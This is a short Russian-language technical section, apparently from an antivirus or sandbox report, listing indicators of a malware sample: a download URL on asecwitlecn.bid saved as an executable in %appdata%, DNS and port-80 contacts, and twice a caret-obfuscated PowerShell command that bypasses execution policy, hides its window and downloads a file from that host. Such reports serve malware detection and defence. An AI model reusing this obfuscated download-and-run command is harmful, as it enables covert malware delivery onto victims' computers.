Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^W^E^rS^hel^l.eXe -exeC^ut^I^o^N^pol^ICy^ ^by^pa^ss^ -NOP^ROFil^E -w^InD^OWstYLe^ hi^DDEN (^n^e^w^-Ob^JE^cT syS^tem.NeT^.w^eBcL^Ie^nt).dO^WNLoA^dfil^E('http://asecwitl...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "po^W^E^rS^hel^l.eXe -exeC^ut^I^o^N^pol^ICy^ ^by^pa^ss^ -NOP^ROFil^E -w^InD^OWstYLe^ hi^DDEN (^n^e^w^-Ob^JE^cT syS^tem.NeT^.w^eBcL^Ie^nt).dO^WNLoA^dfil^E('http://asecwitl...' (со скрытым окном)